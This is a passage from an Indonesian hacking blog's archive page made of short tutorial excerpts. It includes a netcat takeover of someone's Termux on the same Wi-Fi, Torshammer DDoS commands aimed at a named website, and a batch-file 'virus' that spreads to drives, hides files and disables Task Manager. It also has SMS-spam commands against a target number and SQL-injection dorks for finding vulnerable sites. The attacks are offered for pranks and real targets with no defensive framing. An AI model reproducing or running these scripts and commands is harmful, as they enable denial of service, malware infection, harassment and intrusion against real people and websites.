Postingan

Menampilkan postingan dari Januari, 2018

Cara sadap/sniff termux orang lain

Ok tutor yang bakal gue share kali ini masih seputar termux ya gays,yaitu cara Sadap Termux Orang Lain Yang Satu Jaringan Tutor ini bisa dibilang sniffing aktive,why? Karna kita akan bebas mengotak atik termux korban gays. Waduh Kok Aneh Ya? Jadi Khasus Kita Di Sini Adalah Hack Si Termux Target Dengan Termux Kita ..... Jika Sukses. Si Termux Target Bakal Bisa Kita Kendalikan Cukup Simple Tapi Sulit Bagian Cari Target :v => Bahan Yg Di Perlukan : - Termux ( disini) - NetCat ( not app ) - Kopi ( agar tidak Ngantuk ) - Rokok ( Masa Ada Kopi Gk Ada Rokok :v ) - Duid ( Buat Beliin gue puls ) Jika Bahan Sudah Lengkap Lanjut Tutornya NB : InI Harus 1 Jaringan ya ... ( 1 Jaringan Itu 1 Wifi Misal Lu Sambung Wifi si A Maka Si Target Harus Konek Di Wifi A Juga.Kalo Si Target Konek Di Wifi B Dan Lu di wifi A Sampe lebaran gajah Gk Bakal Nyambung :v ) Kecuali Lu Port Forwarding :v 1. Buka Si Termux .. Lalu Kita Install Dulu Si NetCat.nya Dengan Cara Ketik : apt-get update && apt

Cara install torshammer dan cara menggunakannya

ok kali ini gue bakal share tutor install torshammer di android menggunakan termux Ddos termux pakai torshammer : Bahan - bahan : - Termux - Torshammer - Internet ----------- How To Install Torshammer -------- Buka termux kalian,lalu masukkan syntax di bawah ini : $ apt-get update $ apt-get install git $ apt-get install tor $ apt-get install python2 $ tor Jika sudah ter-install. New session + ketik clonenya : $ git clone https://github.com/dotfighter/ torshammer.git $ ls $ cd torshammer $ python2 torshammer.py -T -t seword.com ( web yang kalian attack ) NB:ddos tidak bisa dilakukan sendirian, jika ingin ddos dianjurkan berjemaah

Cara Melacak Posisi dan Lokasi Seseorang Lewat Nomor HP

Cara Melacak Posisi dan Lokasi Seseorang Lewat Nomor HP Dengan Akurat – Saat ini kita hidup pada era dimana telfon genggam atau smartphone menjadi suatu barang yang sangat penting. Tanpa kehadiran barang tersebut kita tentunya bakal sulit buat berkomunikasi semisal menghubungi seseorang dengan cara telfon, saling bertukar SMS, atau bahkan untuk sekedar browsing untuk mencari berita terbaru maupun untuk saling sapa pada jejaring sosial. Berkaca dari hal tersebut, telfon genggam atau smartphone tentunya menjadi suatu barang yang kedudukannya sangat penting dalam kegiatan sehari-hari. Berkat kegunaannya yang vital tersebut, saat ini banyak oknum-oknum yang tidak bertanggung jawab memanfaatkan keberadaan ponsel atau smartphone untuk melancarkan aksi kriminal mereka. Ya, saat ini memang marak kita jumpai modus-modus penipuan yang mengatasnamakan institusi tertentu atau nama seseorang untuk menipu dan aktivitas tersebut dilancarkan lewat telfon genggam atau smartphone dimana biasanya mer

Cara membuat virus

Gambar
Ok kali ini gue bakal share script virus yang bisa kalian pakek buat ngerjain temen or mantan :v Eet...tapi kalo buat ngerjain temen jangan deh soalnya ini agak berbahaya sih. Ok langsung aja scriptnya di bawah ya.. Bahan : -Pc -Notepad Jika bahan sudah lengkap silahka copy scrip dibawah Echo off > C:\virxx.txt if no exist C:\Windows\%0 copy %0 C:\Windows for %%p in (A C D E F G H) do copy %0 %%p: for %%q in (A C D E F G H) do dir %%q:\*.3gp /B /S >> C:\virxx.txt REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHiden /t REG_DWORD /d 0 /f for %%r in (A C D E F G H) do attrib +h +s %%r:\*.3gp /s RE

Free download bussybox installer

Gambar
Ok guys kali ini saya mau share aplikasi android, khususnya buat yang suka ngoprek pasti sudah tau kegunaan aplikasi ini. Busybox Installer Pro merupakan aplikasi yang berguna untuk mengistall versi busybox di android. BusyBox sendiri merupakan paket yang disediakan sebagai patch, yang dimana didalamnya memiliki script-script maupun fungsi-fungsi perintah dasar sistem. (Contoh: Pada Windows sama seperti CMD - "Command Prompt", dan jika Linux sama seperti perintah pada "Terminal".) BusyBox  bertujuan sebagai penambah kemampuan kinerja sistem dalam pengaksesan dalam mode command (perintah, maupun script). screenshotnya :  Sekilas tentang busybox dan kegunaannya diperangkat android,  Ketika kamu rooting Android kamu, biasanya aplikasi busyBox ini sudah otomatis terinstal, tapi jika belum terinstal maka kamu bisa mendownloadnya pada link dibawah. Apakah  fungsi BusyBox ? Apakah BusyBox penting ?  Berikut saya paparkan. BusyBox adalah  sebuah aplikasi un

Cara spam dengan ternux di android

         Ok guys kali ini gu bakal share tutorial for android yang lumayan keren ya and tidak kalah keren sama pc langsung aja ya.   Tutorial spammer for android with termux Bahan: 1. TERMUX Pertama Anda menyiapkan aplikasi termux. aplikasi bisa di download di PLAY STORE 2. INSTALL GIT penginstalannya gampang kok caranya buka termux, ketik perintah: $ pkg install git 3. INSTALL TOOLS SPAMMER GRAB ketik perintah: $ git clone https://github.com/p4kl0nc4t/Spammer-Grab 4. Install python2 ketik perintah: $ pkg install python2 dan jangan lupa install requests $ pip2 install requests  jika bahan dah siap mari kita beraksi kawan!!! ketik perintah: $ ls $ cd Spammer-Grab $ ls $ chmod +x spammer.py $ python2 spammer.py 6289xxxxx --delay 30 mantapkan buat ngisengin teman :) cara nyetop tinggal tekan CTRL+C atau tekan volume down+C NB: GANTI NOMER 6289xxxxx dengan nomer target yang mau di spam

cara sql injection manual

Pengertian SQL Injection SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error Pertama kita cari dulu website yang memiliki celah[vuln] SQL Injection. silahkan sobat cari target di google dengan menggunakan dork. Dork SQLi : inurl:azerty.php?id= , inurl:bouquin.php?id= , inurl:lien.php?id= , inurl:clavier.php?id= inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:games.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= atau liat kumpulan dork racikan gue -nah setelah itu yang harus kita lakukan adalah mengetahui apa

Linux deploy free download

Gambar
Aplikasi ini adalah perangkat lunak open source untuk instalasi cepat dan mudah dari sistem operasi (OS) GNU / Linux pada perangkat Android Anda. Aplikasi membuat disk image pada kartu flash, mount dan menginstal distribusi OS. Aplikasi dari sistem baru dijalankan dalam lingkungan chroot dan bekerja sama dengan platform Android. Semua perubahan yang dilakukan pada perangkat yang reversibel, yaitu aplikasi dan komponen dapat dihilangkan sepenuhnya. Pemasangan distribusi dilakukan dengan men-download file dari mirror resmi secara online melalui internet. Aplikasi ini membutuhkan hak superuser (ROOT). Program ini mendukung antarmuka multi-bahasa. Anda dapat mengelola proses menginstal OS, dan setelah instalasi, Anda dapat memulai dan menghentikan layanan dari sistem baru (ada dukungan untuk menjalankan skrip Anda) melalui UI. Proses instalasi dilaporkan sebagai teks dalam jendela utama aplikasi. Selama instalasi, program akan menyesuaikan lingkungan, yang meliputi lingkungan sistem da

Cara install linux diandroid

        Ok guys sorry gue telat post karna sibuk guys. Jadi kali ini gue bakal share tutor yang bener" bakal bikin kalian gk nyesel buka blog gue.         Ok langsung aja ya kali ini gue bakal share tutor install linux di androit, eettt bukan termux or gnu root ya tapi ini bener" linux..   Syarat-syarat: -hp udah diroot -Ram minim 1GB -Internal minim 1GB -External/sim card minim 4Gb -koneksi yang kenceng ya agar tidak bengong Ok jika syarat-syarat diatas sudah dipenuhin langsung aja kebahannya. Bahan-bahan . 1. Busybox Installer(download disini) 2. Linux Deploy( download disini ) 3. Android VNC Viewer( download disini ) Ok jika bahan-bahan sudah lengkap mari kita lanjut ketutor penginstalannya ya. Langkah-langkah penginstalan: 1. install versi bussy yang mana aja terserah kalian 2.jika sudah sukses Buka linux deploy nya 3.lalu tekan tombol instal. 4.Lalu kalian pilih dah linux apa saja terserah kalian 5.Kalau sudah pilih Gnome. 6.Lalu kalian cek list

Dork fresh 2018

Ok sorry gue agak lama gk post karna pc gue lagi ngambek..ok langsung aj di comot gays shop.cgi?prod_id= site:com shop.php4?articleID= site:com shop.aspx?left= site:com shop.search?p= site:com shop.php3?project= site:com shop.search?newsticker_infon= site:com shop.search?PackageName= site:com shop.php4?price= site:com shop.php?redirpage= site:com shop.php3?MaterialID= site:com shop.cgi?dID= site:com shop.html?limitstart= site:com shop.php?icid= site:com shop.asp?hand-held-slotsslotgame= site:com shop.html?ogl_id= site:com shop.php?game= site:com shop.php4?filepath= site:com shop.php?g= site:com shop.html?hpproduct= site:com shop.search?osCsid= site:com shop.search?pagetype= site:com shop.php4?t1= site:com shop.search?P_ID= site:com shop.html?cccid= site:com shop.search?promoid= site:com shop.cgi?query= site:com shop.aspx?historialeer= site:com shop.php3?advertid= site:com shop.php?go= site:com shop.php4?limitstart= site:com shop.asp?id_category= site:co